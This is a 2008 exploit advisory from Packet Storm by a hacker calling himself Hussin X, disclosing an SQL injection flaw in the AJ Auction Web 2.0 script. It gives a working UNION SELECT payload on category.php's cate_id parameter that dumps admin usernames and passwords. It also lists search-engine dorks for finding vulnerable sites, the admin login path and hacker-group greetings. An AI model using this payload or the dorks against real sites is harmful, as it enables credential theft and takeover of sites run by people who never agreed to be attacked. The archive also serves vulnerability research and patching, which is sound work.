ajauctionweb-sql.txt

2008-06-20T00:00:00
ID PACKETSTORM:67521
Type packetstorm
Reporter Hussin X
Modified 2008-06-20T00:00:00

Description

                                        
                                            `#########################################################  
#  
# Auction Web 2.0 SQL Injection Vulnerability  
#========================================================  
# Author: Hussin X =  
# =  
# Home : www.tryag.cc/cc =  
# =  
# email: darkangel_g85[at]Yahoo[DoT]com =  
# hussin.x[at]hotmail[DoT]com =  
# =  
#=========================================================  
# HomE script : http://www.ajauctionpro.com/ajhome.php  
#   
# Demo : http://www.ajauctionpro.com/auction_web2.0/   
#   
# DorK : Powered By AJ Auction Web  
# DorK : Powered By Auction Web  
#   
##########################################################  
  
Exploit:   
  
http://localhost.com/[PaTs]/category.php?cate_id=-1+union+select+1,concat(user_name,0x3a,password),3,4+from+admin--  
  
  
Admin login  
  
admin/index.php  
  
################################################################################  
#####################################( Greetz )#################################  
# #  
# tryag / Mr.IraQ / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUA #   
# mos_chori / Rafi / FAHD / Iraq Hackers / #   
# #  
#################################(and All IRAQIs)###############################  
################################################################################  
`